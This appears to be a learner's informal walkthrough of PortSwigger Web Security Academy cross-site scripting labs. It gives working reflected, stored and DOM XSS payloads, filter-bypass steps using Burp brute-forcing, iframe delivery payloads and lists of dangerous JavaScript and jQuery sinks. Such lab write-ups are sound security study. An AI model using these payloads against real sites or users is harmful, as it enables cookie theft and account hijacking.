   

                              CROSS SITE SCRIPTING
                              ====================


 lab: Reflected XSS into HTML context with most tags and attributes blocked
 --------------------------------------------------------------------------
 1. <script>alert(1)</script>   => tags are not allowed
 2. so i put <>, then show [no result for <>], so i got that some tags are allowed
 3. so i bruteforce it [<$$>] with burp, copying tags from portswigger
 4. then got the [<body>] tag is allowed
 5. put <body onload='alert(1)'>, but show attributes are not allowed
 6. so i bruteforce [<body%20$$>] by coping events from portswigger
 7. so got [onresize] , putted <body onresize='alert(1)>' when i resize the page, {alert}
 8. but to solve the lab, use [print()]
 9. send this payload [<iframe src="https://0a8c00b1033c44b280a517eb000a0051.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>] to the user
 10. [BOOM!]



 lab: DOM XSS in document.write sink using source location.search
 ----------------------------------------------------------------
 1. i put [hello] in the search bar
 2. the inspect and find hello, then i got 
                        <img src="/resources/images/tracker.gif?searchTerms='+query+'">');
     my input is replaced with [query">],
 3. So i used "><script>alert(1)</script>
 4. [BOOM!]     




 Lab: DOM XSS in document.write sink using source location.search inside a select element   
 ---------------------------------------------------------------------------------
 1. when i selected london, got [<select name="storeId">....</select>]
 2. so i inject in the url like this [?productId=1&storeId=London"><script>alert(1)</script>]
 3. BOOM!



 DOM XSS in jQuery anchor href attribute sink using location.search source
 -------------------------------------------------------------------------

 1. dom based xss vulnerability in feedback 
 2. i inspect the page , the got 
 $(function() { $('#backLink').attr("href", (new URLSearchParams(window.location.search)).get('returnPath')); });

 3. it save the input in the returnPath like [feedback?returnPath]

 4. so i inject like this [feedback?returnPath=javascript:alert(document.cookie)]
 5.BOOM!




 Lab: DOM XSS in jQuery selector sink using a hashchange event
 -------------------------------------------------------------

1. dom based xss vuln in home page
2. when i view source
$(window).on('hashchange', function(){ var post = $('section.blog-list h2:contains(' + decodeURIComponent(window.location.hash.slice(1)) + ')'); if (post) post.get(0).scrollIntoView();

3. it typically run the code behind #
/#<img src=x onerror='alert(1)'> , alert

4. the goal is to send the exploit included print()
5. so i sent <iframe src="https://0aa200b203898c3980a20de60009000a.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>

6. BOOM!





DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded
----------------------------------------------------------------------------------

1. the vuln is in the search box , the web page used a AngularJS expression
2. when i inspect the page , and i realize that the search item work with [{{hello}}]
3. so i put the basic payload [{{constructor.constructor('alert(1)')()}}]
4. BOOM!



Reflected DOM XSS
-----------------

1. first i input random word in the search box
2. check the inspect and source code
3. use burpsuite and in sitemap , the input use eval() and the response is like

{"results":[],"searchTerm":"hello"}

4. i inject this payload => hello/"-alert(1)}//,

response => {"results":[],"searchTerm":"hello\\"-alert(1)}//"}


/"  => to escape the quote
-  => + is decode
// => to close the code behind

5. BOOM!





the main sinks that can lead to DOM-XSS vulnerabilities:
--------------------------------------------------------
document.write()
document.writeln()
document.domain
element.innerHTML
element.outerHTML
element.insertAdjacentHTML
element.onevent

                        


jquery function that can leak to XSS vulnerability:
---------------------------------------------------
add()
after()
append()
animate()
insertAfter()
insertBefore()
before()
html()
prepend()
replaceAll()
replaceWith()
wrap()
wrapInner()
wrapAll()
has()
constructor()
init()
index()
jQuery.parseHTML()
$.parseHTML()



Lab: Stored DOM XSS
-------------------
1. vuln is in the comment box
2. when i run <h1>hello</h1>, render <h1>hello
3. so realize that it delete the second tag
4. so i inject <h1><img src=1 onerror=alert(1)>
5. BOOM!





Reflected XSS with some SVG markup allowed
------------------------------------------

1. first i input the simple payload [<script>alert(3)</script>]
2. it response [tags are not allowed]
3. so bruteforce the tag [?search=<$$>] with portswigger's tag
4. then i got [svg] tag and then bruteforce the event again [?search=<svg><$$>]
5. got [onbegin] event, i gloogloo how to use the svg tag and onbegin event 
6. then got [<svg><animateTransform onbegin="alert(1)">]
7. BOOM!




Stored XSS into anchor href attribute with double quotes HTML-encoded
---------------------------------------------------------------------

1. first i filled the comment, name, email and site
2. and then check the inspect , and found [<a id="author" href="fake.com">fake</a>]
3. so realize that we have full control of href tag
4. i fill the random word in the others and in website field [javascript:alert(1)]
5. BOOM!




Reflected XSS in canonical link tag
-----------------------------------

1. first i test the input file by filling random words
2. but nothing comes out , so when i inspect the page
3. found <link rel="cannonical" href="https://0af100b90445e47c8095769b00e900a4.web-security-academy.net/post?postId=2">

4. so i got this can be inject like this [https://0af100b90445e47c8095769b00e900a4.web-security-academy.net/?'accesskey='x'onclick='alert(2)]

it runs like this [<link rel="cannonical" href="https://0af100b90445e47c8095769b00e900a4.web-security-academy.net/?" accesskey="x" onclick="alert(2)">]

the impact is when the user click the shorcut key of 
In linux and window => alt+shift+x
mac => ctrl+alt+x
5. BOOM! alert()





Lab: Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped
---------------------------------------------------------------------------------
1. firstly i inputted random words , but < and " are html encoded 
2. but when i test ' , it turned into \'
3. so i create a payload like this [\';alert(document.domain)//'] => [\\';alert(document.domain)//']
4.BOOM!




Lab: Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped
-------------------------------------------------------------------------------------
1. first i input the command , name, email , and website
2. and when i check the page source , got 
[<a id="author" href="https://www.google.com" onclick="var tracker={track(){}};tracker.track('https://www.google.com');">fake</a>] 

3. when i input [http://foo?'alert(1)'] , ' turn into \'
4. so i html encoded the ' into &apos;, let the browser decode itself

<a id="author" href="https://www.google.com" onclick="var tracker={track(){}};tracker.track('http://foo?&apos;-alert(1)-&apos;');">fake</a>

5. BOOM!






Lab: Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped
--------------------------------------------------------------------------------------

1. when i search random word , and when i check the page source => [`0 search results for 'hello'`]
2. the input is in the backtricks, so i gloogloo the usage to backtrick in javascript and realize that template literals can be used inside the backtricks
3. so the payload is like this [${alert(1)}]
4. BOOM!




Lab: Reflected XSS into a JavaScript string with single quote and backslash escaped
-----------------------------------------------------------------------------------

1. when i search random word and click page source
2. <script>
var searchTerms = 'hello';
document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>
3. so we can break the script like this [hello'</script><img src=x onerror=alert(document.cookie)>]
4. BOOM! (</script><script>alert(2)</script>)=> this payload also works





Reflected XSS into a JavaScript string with angle brackets HTML encoded
-----------------------------------------------------------------------
1. firstly i search 'hello' and view page source and found 
<script>
var searchTerms = ''hello'';
document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
 </script>

2. the payload is simple ['-alert(1)-']
3. BOOM!




Reflected XSS into HTML context with all tags blocked except custom ones
------------------------------------------------------------------------
1. first i used simple payload [<script>alert(2)</script>]
2. response is [tag is not allowed]
3. so i brute force the tag and attributes but nothing works
4. so the custom payload is [<custom-tag onmouseover=alert(1)>]
5. to solve the lab 
<script>
location = 'https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>







